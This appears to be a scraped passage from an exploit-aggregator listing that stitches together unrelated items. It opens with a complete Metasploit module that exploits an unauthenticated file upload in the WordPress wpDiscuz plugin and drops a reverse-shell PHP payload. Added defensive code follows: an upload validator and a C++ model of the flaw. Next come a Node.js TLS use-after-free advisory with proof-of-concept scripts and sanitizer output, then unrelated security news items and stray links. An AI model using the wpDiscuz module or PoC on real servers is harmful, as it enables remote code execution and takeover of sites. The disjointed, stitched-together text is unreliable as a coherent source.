     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::Remote::HTTP::Wordpress
       include Msf::Exploit::FileDropper

       def initialize(info = {})
         super(update_info(info,
           'Name' => 'WordPress wpDiscuz Unauthenticated File Upload Vulnerability',
           'Description' => %q{
             This module exploits an arbitrary file upload in the WordPress wpDiscuz
             plugin version 7.0.4. This flaw gave unauthenticated attackers the ability
             to upload arbitrary files, including PHP files, and achieve remote code
             execution on a vulnerable site's server.
           },
           'Author' => [
             'Chloe Chamberland',   # Vulnerability Discovery, initial msf module
             'Hoa Nguyen - SunCSR'  # Metasploit Module Pull Request
           ],
           'License' => MSF_LICENSE,
           'References' => [
             ['WPVDB', '10333'],
             ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
             ['URL', 'https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
             ['URL', 'https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
           ],
           'Privileged' => false,
           'Platform' => 'php',
           'Arch' => ARCH_PHP,
           'Targets' => [['wpDiscuz < 7.0.5', {}]],
           'DisclosureDate' => 'Feb 21 2020',
           'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
           'DefaultTarget' => 0))

         register_options [
           OptString.new('BLOGPATH', [true, 'Link to the post [/index.php/2020/12/12/post1]', nil]),
         ]
       end

       def check
         check_plugin_version_from_readme('wpdiscuz', '7.0.5')
       end

       def blogpath
         datastore['BLOGPATH']
       end

       # The post page embeds the wmuSecurity nonce the upload endpoint expects
       def find_wmusecurity_id
         res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath) }, 5)
         fail_with(Failure::Unreachable, "#{peer} - Server did not answer") unless res
         match = res.body.match(/wmuSecurity":"(\w+)/)
         fail_with(Failure::NotFound, "#{peer} - wmuSecurity nonce not found in the post page") unless match
         match.captures
       end

       def exploit
         wmusecurity_id = find_wmusecurity_id[0]
         php_page_name = rand_text_alpha(5 + rand(5)) + '.php'

         data = Rex::MIME::Message.new
         data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"')
         data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"')
         data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"')
         data.add_part('1', nil, nil, 'form-data; name="postId"')
         # Image magic prefix followed by the PHP payload, declared as image/gif but named .php
         data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"")
         post_data = data.to_s

         res = send_request_cgi(
           'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
           'method' => 'POST',
           'ctype' => "multipart/form-data; boundary=#{data.bound}",
           'data' => post_data
         )

         fail_with(Failure::Unknown, "#{peer} - Server did not answer") unless res
         unless res.code == 200 && res.body =~ /#{php_page_name}/
           fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
         end
         print_good("Payload uploaded as #{php_page_name}")
         register_files_for_cleanup(php_page_name)

         # The stored name has the form <name>-<digits>.<digits>.php; take it from the URL echoed in the response
         time = Time.new
         year = time.year.to_s
         month = "%02d" % time.month
         regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/)
         wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/', '')

         print_status('Calling payload...')
         send_request_cgi(
           { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', year, month, wp_shell_upload) },
           5
         )
       end
     end

     # 0day.today [2021-01-09]
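     An added example, not the plugin's or the module's code: an upload validator that rejects the 'GIF8'-prefixed PHP file the module sends, by checking the extension, the declared Content-Type and the full image signature together rather than any one of them. The allow-list, the function name and the sample uploads are assumptions of this example.

```python
import os

# Extension -> (accepted magic prefixes, expected Content-Type). Assumed policy.
IMAGE_TYPES = {
    "gif": ((b"GIF87a", b"GIF89a"), "image/gif"),
    "png": ((b"\x89PNG\r\n\x1a\n",), "image/png"),
    "jpg": ((b"\xff\xd8\xff",), "image/jpeg"),
    "jpeg": ((b"\xff\xd8\xff",), "image/jpeg"),
}
# Extensions a PHP web server may execute, wherever they appear in the name.
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "inc"}


def validate_image_upload(filename, data, declared_type):
    """Return (accepted, reason). Every check must pass; each one alone is bypassable."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension"
    # shell.php.gif and shell.gif.php both carry an executable extension somewhere.
    if SERVER_EXECUTABLE & set(parts[1:]):
        return False, "server-executable extension"
    ext = parts[-1]
    if ext not in IMAGE_TYPES:
        return False, "extension not in allow-list"
    magics, mime = IMAGE_TYPES[ext]
    if declared_type.split(";")[0].strip().lower() != mime:
        return False, "Content-Type does not match extension"
    # 'GIF8' alone is not a GIF header; require the full six-byte signature.
    if not data.startswith(magics):
        return False, "magic bytes do not match extension"
    # A valid image header followed by PHP is still a polyglot; reject it outright
    # (a production pipeline would re-encode the image instead of trusting the bytes).
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag"
    return True, "ok"


# Constructed sample uploads; the first is shaped like the module's upload part.
SAMPLES = [
    ("abcde.php", b"GIF8<?php system($_GET['c']); ?>", "image/gif"),
    ("cat.gif", b"GIF8<?php echo 1; ?>", "image/gif"),
    ("cat.gif", b"GIF89a\x01\x00\x01\x00<?php echo 1; ?>", "image/gif"),
    ("cat.gif", b"GIF89a\x01\x00\x01\x00\x80\x00\x00", "image/gif"),
    ("cat.gif", b"GIF89a\x01\x00\x01\x00\x80\x00\x00", "application/x-php"),
]

if __name__ == "__main__":
    for name, body, ctype in SAMPLES:
        print(name, ctype, validate_image_upload(name, body, ctype))
```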
  20. An audit is underway into the Judiciary's Case Management/Electronic Case Files system.

     The United States Judiciary has announced an audit into its systems, following concerns its case file system has been compromised. In making the announcement, the Judiciary said the Administrative Office of the US Courts was working with the Department of Homeland Security on a security audit relating to vulnerabilities in the Judiciary's Case Management/Electronic Case Files system (CM/ECF) that greatly risk compromising highly sensitive non-public documents, particularly sealed filings.

     With the investigation ongoing, the Judiciary said federal courts across the country will be adding new security procedures aimed at protecting highly sensitive confidential documents filed with the courts. Moving forward, highly sensitive court documents filed with federal courts will be accepted for filing in paper form or via a "secure electronic device", such as a thumb drive, and stored in a "secure, stand-alone computer system". The documents will not be uploaded to CM/ECF. Filings not considered highly sensitive will continue to be sealed in CM/ECF "as necessary".

     The Judiciary said that, following guidance from the Department of Homeland Security, its courts have suspended all national and local use of SolarWinds Orion products.

     Earlier this week, the US Department of Justice (DOJ) confirmed that the hackers behind the SolarWinds supply chain attack targeted its IT systems, where they escalated access from the trojanized SolarWinds Orion app to move across its internal network and access the email accounts of some of its employees. The number of impacted DOJ employees is currently believed to be around 3,000 to 3,450. The DOJ said it has now blocked the attacker's point of entry.

     Four US cybersecurity agencies on Monday released a joint statement formally accusing the Russian government of orchestrating the SolarWinds supply chain attack. US officials said that "an advanced persistent threat actor, likely Russian in origin" was responsible for the SolarWinds hack, which officials described as "an intelligence gathering effort".

     Via zdnet.com
  21. Node.js: use-after-free in TLSWrap

Node v14.11.0 (Current) is vulnerable to a use-after-free bug in its TLS implementation. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap object as first argument. If the DoWrite method does not return an error, this object is passed back to the caller as part of a StreamWriteResult structure:

// stream_base-inl.h
WriteWrap* req_wrap = CreateWriteWrap(req_wrap_obj);
err = DoWrite(req_wrap, bufs, count, send_handle);
bool async = err == 0;
if (!async) {
  req_wrap->Dispose();
  req_wrap = nullptr;
}
const char* msg = Error();
if (msg != nullptr) {
  req_wrap_obj->Set(env->context(), env->error_string(), OneByteString(env->isolate(), msg)).Check();
  ClearError();
}
return StreamWriteResult { async, err, req_wrap, total_bytes };

The problem is that TLSWrap::DoWrite can trigger a free of the WriteWrap object without returning an error when the EncOut() call at the end of the DoWrite method fails. EncOut() calls underlying_stream()->Write() to write TLS encrypted data to the network socket. If this write fails, InvokeQueued() is called and the function returns immediately:

// tls_wrap.cc
// Write any encrypted/handshake output that may be ready.
// Guard against sync call of current_write_->Done(), its unsupported.
in_dowrite_ = true;
EncOut();
in_dowrite_ = false;
return 0;

// tls_wrap.cc
void TLSWrap::EncOut() {
  [...]
  Debug(this, "Writing %zu buffers to the underlying stream", count);
  StreamWriteResult res = underlying_stream()->Write(bufs, count);
  if (res.err != 0) {
    InvokeQueued(res.err);
    return;
  }
  [..]

InvokeQueued() triggers an immediate free of the req_wrap WriteWrap* object via the following call chain:

node::TLSWrap::InvokeQueued
  -> node::StreamReq::Done
  -> node::WriteWrap::OnDone
  -> node::StreamReq::Dispose
  -> node::BaseObjectPtrImpl<node::AsyncWrap, false>::~BaseObjectPtrImpl()
  -> node::BaseObject::decrease_refcount()
  -> node::SimpleWriteWrap<node::AsyncWrap>::~SimpleWriteWrap()

Making underlying_stream()->Write fail is as easy as closing the socket at the other side of the connection just before the write to trigger a broken pipe error. Because node::TLSWrap::DoWrite doesn't return an error code, node::StreamBase::Write will return the freed WriteWrap object as part of its StreamWriteResult. For calls by node::StreamBase::WriteV, this will immediately trigger a use-after-free when the SetAllocatedStorage() method is called on the freed object:

// stream_base.cc
StreamWriteResult res = Write(*bufs, count, nullptr, req_wrap_obj);
SetWriteResult(res);
if (res.wrap != nullptr && storage_size > 0) {
  res.wrap->SetAllocatedStorage(std::move(storage));
}

The bug can be easily triggered against a simple node HTTPS server application. Under normal circumstances and without an ASAN enabled build, the UAF doesn't trigger a crash on Linux as the freed memory won't get reallocated in time and the write in SetAllocatedStorage corrupts chunk metadata that isn't used for small chunks. I think this is the only reason why the bug wasn't spotted earlier, as the broken pipe error path should be hit pretty often in the real world. However, this issue might still be exploitable with the right heap layout (if the WriteWrap chunk is merged with a larger chunk during the free), different heap implementations and/or some other control flow that allows allocating something before the reuse.
Proof-of-Concept:

server.js:

const https = require('https');

const key = `-----BEGIN EC PARAMETERS-----
BggqhkjOPQMBBw==
-----END EC PARAMETERS-----
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIDKfHHbiJMdu2STyHL11fWC7psMY19/gUNpsUpkwgGACoAoGCCqGSM49
AwEHoUQDQgAEItqm+pYj3Ca8bi5mBs+H8xSMxuW2JNn4I+kw3aREsetLk8pn3o81
PWBiTdSZrGBGQSy+UAlQvYeE6Z/QXQk8aw==
-----END EC PRIVATE KEY-----`;

const cert = `-----BEGIN CERTIFICATE-----
MIIBhjCCASsCFDJU1tCo88NYU//pE+DQKO9hUDsFMAoGCCqGSM49BAMCMEUxCzAJ
BgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5l
dCBXaWRnaXRzIFB0eSBMdGQwHhcNMjAwOTIyMDg1NDU5WhcNNDgwMjA3MDg1NDU5
WjBFMQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwY
SW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcD
QgAEItqm+pYj3Ca8bi5mBs+H8xSMxuW2JNn4I+kw3aREsetLk8pn3o81PWBiTdSZ
rGBGQSy+UAlQvYeE6Z/QXQk8azAKBggqhkjOPQQDAgNJADBGAiEA7Bdn4F87KqIe
Y/ABy/XIXXpFUb2nyv3zV7POQi2lPcECIQC3UWLmfiedpiIKsf9YRIyO0uEood7+
glj2R1NNr1X68w==
-----END CERTIFICATE-----`;

const options = {
  key: key,
  cert: cert,
};

https.createServer(options, function (req, res) {
  res.writeHead(200);
  res.end("hello world\n");
}).listen(4444);

---

poc.js:

const tls = require('tls');

// Three queued writes on one TLS socket; the server's reply triggers
// socket.destroy(), so a later write hits the broken pipe error path.
var socket = tls.connect(4444, 'localhost', { rejectUnauthorized: false }, () => {
  console.log("connected");
  socket.write("GET / HTTP/1.1\r\nHost: localhost\r\nConnection: Keep-alive\r\n\r\n");
  socket.write("GET / HTTP/1.1\r\nHost: localhost\r\nConnection: Keep-alive\r\n\r\n");
  socket.write("GET / HTTP/1.1\r\nHost: localhost\r\nConnection: Keep-alive\r\n\r\n");
});

socket.on('data', () => {
  socket.destroy();
});

The POC triggers a crash when server.js is run on an ASAN enabled build of node.js:

==1408671==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000011138 at pc 0x0000011929b6 bp 0x7ffc8c2243f0 sp 0x7ffc8c2243e8
READ of size 8 at 0x608000011138 thread T0
    #0 0x11929b5 in std::__uniq_ptr_impl<v8::BackingStore, std::default_delete<v8::BackingStore> >::_M_ptr() const
/usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:154:42
    #1 0x1192974 in std::unique_ptr<v8::BackingStore, std::default_delete<v8::BackingStore> >::get() const /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:361:21
    #2 0x1193fb4 in std::unique_ptr<v8::BackingStore, std::default_delete<v8::BackingStore> >::operator bool() const /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:375:16
    #3 0x1190415 in node::AllocatedBuffer::data() /pwd/out/../src/allocated_buffer-inl.h:79:8
    #4 0x16f8a79 in node::WriteWrap::SetAllocatedStorage(node::AllocatedBuffer&&) /pwd/out/../src/stream_base-inl.h:247:3
    #5 0x16f1141 in node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:172:15
    #6 0x16faa47 in void node::StreamBase::JSMethod<&(node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&))>(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:468:29
    #7 0x1caf642 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo) /pwd/out/../deps/v8/src/api/api-arguments-inl.h:158:3
    #8 0x1cabfaf in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:111:36
    #9 0x1ca8f8a in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:141:5
    #10 0x1ca81e0 in v8::internal::Builtin_HandleApiCall(int, unsigned long*, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:129:1
    #11 0x3e096df in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_BuiltinExit (/p0/node/node-v14.11.0/out/Debug/node+0x3e096df)

0x608000011138 is located 24 bytes inside of 88-byte region [0x608000011120,0x608000011178)
freed by thread T0 here:
    #0 0xe79b1d in operator delete(void*) (/p0/node/node-v14.11.0/out/Debug/node+0xe79b1d)
    #1 0x1707177 in node::SimpleWriteWrap<node::AsyncWrap>::~SimpleWriteWrap() /pwd/out/../src/stream_base.h:418:7
    #2 0xf943be in node::BaseObject::decrease_refcount() /pwd/out/../src/base_object-inl.h:203:7
    #3 0x10886e6 in node::BaseObjectPtrImpl<node::AsyncWrap, false>::~BaseObjectPtrImpl() /pwd/out/../src/base_object-inl.h:248:12
    #4 0x13c2a3c in node::StreamReq::Dispose() /pwd/out/../src/stream_base-inl.h:40:1
    #5 0x16f794c in node::WriteWrap::OnDone(int) /pwd/out/../src/stream_base.cc:591:3
    #6 0x10e71f8 in node::StreamReq::Done(int, char const*) /pwd/out/../src/stream_base-inl.h:261:3
    #7 0x1921f95 in node::TLSWrap::InvokeQueued(int, char const*) /pwd/out/../src/tls_wrap.cc:101:8
    #8 0x1927f39 in node::TLSWrap::EncOut() /pwd/out/../src/tls_wrap.cc:356:5
    #9 0x192e258 in node::TLSWrap::DoWrite(node::WriteWrap*, uv_buf_t*, unsigned long, uv_stream_s*) /pwd/out/../src/tls_wrap.cc:820:3
    #10 0x13b50dd in node::StreamBase::Write(uv_buf_t*, unsigned long, uv_stream_s*, v8::Local<v8::Object>) /pwd/out/../src/stream_base-inl.h:193:9
    #11 0x16f108f in node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:169:27
    #12 0x16faa47 in void node::StreamBase::JSMethod<&(node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&))>(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:468:29
    #13 0x1caf642 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo) /pwd/out/../deps/v8/src/api/api-arguments-inl.h:158:3
    #14 0x1cabfaf in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:111:36
    #15 0x1ca8f8a in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:141:5
    #16 0x1ca81e0 in v8::internal::Builtin_HandleApiCall(int, unsigned long*, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:129:1
    #17 0x3e096df in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_BuiltinExit (/p0/node/node-v14.11.0/out/Debug/node+0x3e096df)

previously allocated by thread T0 here:
    #0 0xe792bd in operator new(unsigned long) (/p0/node/node-v14.11.0/out/Debug/node+0xe792bd)
    #1 0x16f81c2 in node::StreamBase::CreateWriteWrap(v8::Local<v8::Object>) /pwd/out/../src/stream_base.cc:629:10
    #2 0x13b4fb0 in node::StreamBase::Write(uv_buf_t*, unsigned long, uv_stream_s*, v8::Local<v8::Object>) /pwd/out/../src/stream_base-inl.h:191:25
    #3 0x16f108f in node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:169:27
    #4 0x16faa47 in void node::StreamBase::JSMethod<&(node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&))>(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:468:29
    #5 0x1caf642 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo) /pwd/out/../deps/v8/src/api/api-arguments-inl.h:158:3
    #6 0x1cabfaf in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:111:36
    #7 0x1ca8f8a in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:141:5
    #8 0x1ca81e0 in v8::internal::Builtin_HandleApiCall(int, unsigned long*, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:129:1
    #9 0x3e096df in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_BuiltinExit (/p0/node/node-v14.11.0/out/Debug/node+0x3e096df)
    #10 0x3c06181 in Builtins_InterpreterEntryTrampoline (/p0/node/node-v14.11.0/out/Debug/node+0x3c06181)
    #11 0x3c06181 in Builtins_InterpreterEntryTrampoline (/p0/node/node-v14.11.0/out/Debug/node+0x3c06181)

SUMMARY: AddressSanitizer: heap-use-after-free /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:154:42 in std::__uniq_ptr_impl<v8::BackingStore, std::default_delete<v8::BackingStore> >::_M_ptr() const
Shadow bytes around the buggy address:
  0x0c107fffa1d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa1e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa1f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa200: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c107fffa210: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c107fffa220: fa fa fa fa fd fd fd[fd]fd fd fd fd fd fd fd fa
  0x0c107fffa230: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa240: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa250: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa260: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c107fffa270: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1408671==ABORTING

Credits: Felix Wilhelm of Google Project Zero

# 0day.today [2021-01-07]
# Source
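The root cause in the advisory above is an ownership contract broken on an error path: the callee (EncOut, via InvokeQueued) completes and frees the request, but DoWrite still reports success, so the caller keeps the WriteWrap pointer and dereferences it. The following C++ is an added, reduced model of that hand-off written for this page; it is not Node's source, and the names StreamModel, WriteReq, Socket and write_leaks_dangling_wrap are hypothetical. It contrasts the vulnerable shape (swallow the EncOut result) with a hardened shape (propagate it, so the caller's existing `if (!async)` path nulls the pointer). The "free" is simulated by parking the object in a graveyard and removing it from a live set, so the demonstration itself has no undefined behaviour while still exposing the dangling handle.

```cpp
#include <iostream>
#include <memory>
#include <set>
#include <string>
#include <vector>

// Hypothetical, reduced model of StreamBase::Write -> TLSWrap::DoWrite ->
// TLSWrap::EncOut. Names echo Node's but this is illustration code written
// for this page, not Node's source.

struct WriteReq {
    std::string storage;   // stands in for the WriteWrap's allocated storage
};

struct WriteResult {
    bool async;
    int err;
    WriteReq* wrap;        // non-owning; must be nullptr once the request is done
};

// Simulated transport: once the peer has hung up every write fails (EPIPE).
struct Socket {
    explicit Socket(bool closed) : peer_closed(closed) {}
    int Write(const std::string&) const { return peer_closed ? -32 : 0; }
    bool peer_closed;
};

class StreamModel {
public:
    explicit StreamModel(Socket sock) : sock_(sock) {}

    // Model of StreamBase::Write: allocate the request, hand it to DoWrite and,
    // as in the snippet quoted above, keep the pointer whenever DoWrite says 0.
    WriteResult Write(const std::string& data, bool hardened) {
        std::unique_ptr<WriteReq> req(new WriteReq());
        WriteReq* raw = req.get();
        live_.insert(raw);
        pending_.push_back(std::move(req));
        int err = hardened ? DoWriteHardened(raw, data) : DoWriteVulnerable(raw, data);
        bool async = (err == 0);
        if (!async) {
            Dispose(raw);
            raw = nullptr;
        }
        return WriteResult{async, err, raw};
    }

    bool IsLive(const WriteReq* r) const { return live_.count(r) != 0; }

private:
    // Vulnerable shape: EncOut() may complete (free) the request on a write
    // error, yet DoWrite still returns 0, so the caller keeps the pointer.
    int DoWriteVulnerable(WriteReq* req, const std::string& data) {
        EncOut(req, data);
        return 0;
    }

    // Hardened shape: propagate the EncOut() result, so a request that was
    // already completed is never handed back as a live wrap.
    int DoWriteHardened(WriteReq* req, const std::string& data) {
        return EncOut(req, data);
    }

    // Model of EncOut(): on a failed socket write, complete the queued request
    // immediately, the way InvokeQueued() -> Done() -> Dispose() does.
    int EncOut(WriteReq* req, const std::string& data) {
        int err = sock_.Write(data);
        if (err != 0) Dispose(req);
        return err;
    }

    // "Free" the request. The object is parked in a graveyard rather than
    // deleted so this demonstration has no undefined behaviour; removal from
    // live_ plays the role the real delete has on the heap.
    void Dispose(WriteReq* req) {
        if (live_.erase(req) == 0) return;   // already disposed: double-free guard
        for (auto& p : pending_) {
            if (p.get() == req) graveyard_.push_back(std::move(p));
        }
    }

    Socket sock_;
    std::set<const WriteReq*> live_;
    std::vector<std::unique_ptr<WriteReq>> pending_;
    std::vector<std::unique_ptr<WriteReq>> graveyard_;
};

// True when Write() returned a non-null wrap that was already disposed: the
// dangling pointer that StreamBase::Writev goes on to dereference.
bool write_leaks_dangling_wrap(bool peer_closed, bool hardened) {
    StreamModel stream{Socket(peer_closed)};
    WriteResult res = stream.Write("GET / HTTP/1.1\r\n\r\n", hardened);
    return res.wrap != nullptr && !stream.IsLive(res.wrap);
}

int main() {
    std::cout << "vulnerable, peer closed: dangling=" << write_leaks_dangling_wrap(true, false) << "\n";
    std::cout << "hardened,   peer closed: dangling=" << write_leaks_dangling_wrap(true, true) << "\n";
    return 0;
}
```

The defensive takeaway the model makes concrete: whenever a callee can complete a request on its own error path, that path must be visible to the caller, either as a non-zero return (as in the hardened variant, which lets the existing `if (!async)` branch null the pointer) or by having the callee clear the caller's handle itself. With the peer closed, the vulnerable variant returns a non-null `wrap` that is no longer live; the hardened variant returns `err != 0` and `wrap == nullptr`; with a healthy peer both variants return a live request.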
  22. The "People Nearby" feature in the secure messaging app can be abused to unmask a user's precise location, a researcher said.

A feature that allows Telegram users to see who's nearby can be misused to pinpoint your exact distance to other users – by spoofing one's latitude and longitude.

According to bug-hunter Ahmed Hassan, the "People Nearby" feature could allow an attacker to triangulate the location of unsuspecting Telegram users. The feature is disabled by default, but as Hassan pointed out, "Users who enable this feature are not aware they are basically publishing their precise location."

The feature lists exactly how far people are from one's location (1.3 miles and so on). This isn't an issue as long as that number remains a radius. But it's possible to spoof one's location for three different points, and then use the resulting three distances to precisely pinpoint where a target is, the researcher found.

To spoof a GPS location, an adversary has various options, but the easiest method, Hassan noted in a Monday blog, is to "just walk around the area, collect the GPS latitude and longitude of yourself, and how far the target person is from you (super easy)." Another option is to use a GPS-spoofing app.

Armed with the three locations, an attacker can then open Google Earth Pro, plug in the spoofed locations, and use a ruler to find the middle point between the three.

For Telegram's part, the company said it doesn't regard the issue as a bug, and declined Hassan's security report. Telegram did not immediately return a request for comment.

Via threatpost.com
  23. https://github.com/samwize/python-email-crawler 10 years. Happy anniversary!
  24. What other pictures should I give you? http://letmegooglethat.com/?q=2.0+2.5"+Hard+drive+enclosure+Gembird http://letmegooglethat.com/?q=WD1600AAJS-00L7A0%2C+DCM+HANNHTJCH%2C+Western+Digital+160GB+SATA+3.5+harde+schijf
  25. Amazon's Ring doorbells have been compromised in some swatting attacks

Hackers have livestreamed police raids on innocent households after hijacking their victims' smart home devices and making a hoax call to the authorities, the FBI has warned. It said offenders had even spoken to responding officers via the hacked kit.

It marks the latest escalation of a crime known as "swatting", in which offenders fool armed police or other emergency responders to go to a target's residence. The FBI said there were "deadly" risks. A fake call about a hostage situation led to police shooting a man in Kansas three years ago, and there have been non-fatal injuries in other cases.

Shouted insults

The FBI said it believed the latest twist on the "prank" was able to be carried out because the victims had reused passwords from other services when setting up their smart devices. Lists of hacked credentials are frequently bought and sold via illegal markets. And offenders often run the details stolen from one service through others to find where passwords have been reused.

There have also been reports of security flaws in some products, including smart doorbells, which have allowed hackers to steal network passwords and gain access to other smart devices sharing the same wi-fi. The apps and websites used to set up such products often store the user's name and address in their account settings in order to offer location-specific services.

The notice does not refer to any specific incident, but there have been related press reports in recent weeks. In November, NBC News highlighted a case in which police went to a Florida home after receiving a fake 911 call from a man saying he had killed his wife and was hoarding explosives. When they left the building after discovering it to be a hoax, officers reported hearing someone insult them via the property's internet-connected Ring doorbell.

In another incident the same month in Virginia, police reported hearing the hacker shout "help me" after arriving at the home of a person they had told might be about to kill himself. When they questioned the attacker via the device, he claimed to have compromised four different cameras at the location and to be charging others $5 to watch online.

A further event was also reported in Georgia in which the attacker shouted racial abuse at his victims after the police stood down, and claimed to have carried out more than a dozen such hacks that day.

Ring has denied its own systems have been compromised. It uses two-step verification, which means device owners can only access their accounts from a new computer if they enter a code emailed or sent to them via text message. However, if either of those forms of communication are also compromised the user remains vulnerable.

As a consequence, the FBI has advised smart device owners to ensure they provide a different complex passcode to each online service they use.

Via bbc.com